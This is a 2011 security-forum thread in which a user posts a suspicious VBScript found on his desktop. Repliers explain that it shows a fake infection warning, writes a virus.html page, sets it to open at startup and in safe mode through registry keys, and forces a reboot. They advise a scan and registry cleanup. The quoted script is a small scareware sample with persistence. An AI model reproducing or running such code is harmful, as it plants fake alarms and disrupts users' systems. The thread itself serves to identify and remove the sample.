I have an unfamiliar test.vbs.txt file on my desktop what should I do?

Discussion in 'malware problems & news' started by MrGump, Oct 7, 2011.

Thread Status:
Not open for further replies.
  1. MrGump

    MrGump Registered Member

    Joined:
    Sep 5, 2009
    Posts:
    394
    i wont double click it as I assume this will run whatever is in it but i did right click and edit it and this is what i see:

    Code:
    rem generated by zerokool
    rem written 06-oct-2011
    
    Msgbox "ERROR",32, "INFECTED!"
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set File = fso.CreateTextFile ("C:\virus.html", True)
    File.WriteLine("<head>")
    File.WriteLine("<title> WARNING VIRUS DETECTED</title>")
    File.WriteLine("</head>")
    FileWriteLine("Warning a virus has been detected on your system.")
    
    Dim WshShell, bKey
    Set WshShell = WScript.CreateObject("WScript.Shell")
    WshShell.RegWrite "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\phuhrenzix", 1, "REG_BINARY" 
    WshShell.RegWrite "HKLM\system\currentcontrolset\control\safeboot\minimal\phuhrenzix", "C:\virus.html", "REG_SZ"
    WshShell.RegWrite "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\network\phuhrenzix", 1, "REG_BINARY" 
    WshShell.RegWrite "HKLM\system\currentcontrolset\control\safeboot\network\phuhrenzix", "C:\virus.html", "REG_SZ"
    
    WshShell.RegWrite "HKLM\SOFTWARE\Microsoft\CurrentVersion\Run\phuhrenzix", 1, "REG_BINARY" 
    WshShell.RegWrite "HKLM\SOFTWARE\Microsoft\CurrentVersion\Run\phuhrenzix", "C:\virus.html", "REG_SZ"
    Set objShell = CreateObject("Wscript.Shell")
    objShell.Run "virus.html"
    
    Dim objShell
    Set objShell = WScript.CreateObject("WScript.Shell")
    objShell.Run "shutdown /r /t 0"
    is this some kind of hoax? *puppy*

    did it get past my AV?
     
    Last edited: Oct 7, 2011
  2. kjempen

    kjempen Registered Member

    Joined:
    May 6, 2004
    Posts:
    379
    I'm no expert when it comes to Visual Basic, but the visual basic script seems to pop up a message box and create a web page ("virus.html") that gets opened even in safe mode (because it modifies your Windows registry). The web page displays a warning message that your pc is infected by a virus. Looks a lot like a rogue/fake antivirus is (or has been) installed on your system. You should do a scan with Malwarebytes Anti-Malware.

    EDIT: Probably a good idea to go through your Windows registry and make sure no registry keys with the word "phuhrenzix" are left.
     
  3. xxJackxx

    xxJackxx Registered Member

    Joined:
    Oct 23, 2008
    Posts:
    4,050
    Location:
    USA
    If the final extension is .txt then it shouldn't be able to do anything. I would still check the registry as suggested above and make sure that virus.html does not exist on your c: drive. Scan as suggested and delete the file.
     
  4. MrGump

    MrGump Registered Member

    Joined:
    Sep 5, 2009
    Posts:
    394
    thanks to you both
     
Loading...
Thread Status:
Not open for further replies.